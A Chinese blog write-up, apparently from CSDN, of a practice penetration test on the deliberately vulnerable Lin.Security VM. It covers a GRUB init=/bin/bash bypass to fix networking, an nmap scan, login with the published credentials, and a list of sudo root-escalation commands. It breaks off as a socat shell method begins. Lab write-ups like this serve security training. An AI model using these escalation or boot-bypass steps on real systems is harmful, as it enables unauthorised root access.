【渗透测试】Lin.Security靶机渗透练习_虚拟机无法获取ip的配置方法+靶机多种提权方式练习

靶机描述:在in.security,我们希望开发一个Linux虚拟机,该虚拟机在编写本文时基于最新的Ubuntu发行版(18.04 LTS),但存在许多漏洞,这些漏洞使用户无法升级扎根在盒子上。旨在帮助理解某些内置应用程序和服务(如果配置错误)可能会被攻击者滥用。
首先,您可以使用以下凭据登录主机:bob / secret

下载地址:https://in.security/downloads/lin.security_v1.0.ova

环境配置:

1.因为直接开机的security靶机NAT连接,无法获取到ip,所以重新关机,在开机第一秒按住shift键,然后按e,进入配置界面:

将ro改为 rw signie init=/bin/bash

 2.按ctrl+X或者F10重启,重启之后查看网卡为ens33:

3.这时候需要修改enp0s3为ens33,修改之后进行应用,重启即可:

Ubuntu从16.04开始,虽然 /etc/network/interfaces 里也可以修改固定IP的配置,但是多网卡采用 netplan方式,配置文件是:/etc/netplan/50-cloud-init.yaml

vim /etc/netplan/50-cloud-init.yaml
netplan apply //配置应用生效

 4.如果还是不行,则修改/etc/network/interfaces中的配置:

vim /etc/network/interfaces
新增两行:
auto ens33
iface ens33 inet dhcp

一、信息收集

1.扫描端口,开放了22端口,根据给的账号进行远程登录:

nmap -sS -sV -T5 -p- 192.168.225.192
ssh [email protected]

二、sudo提权

2.由于该靶机存在许多漏洞,所以提权方法很多:

1)常规方法:sudo -l查看支持root权限的命令

 输入很多命令均可提权:

sudo ash
sudo bash
sudo /bin/bash
sudo dash
sudo csh
sudo sh
sudo curl
sudo zsh

 2)socat提权:

在服务端建立一个端口1234的shell

sudo so
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值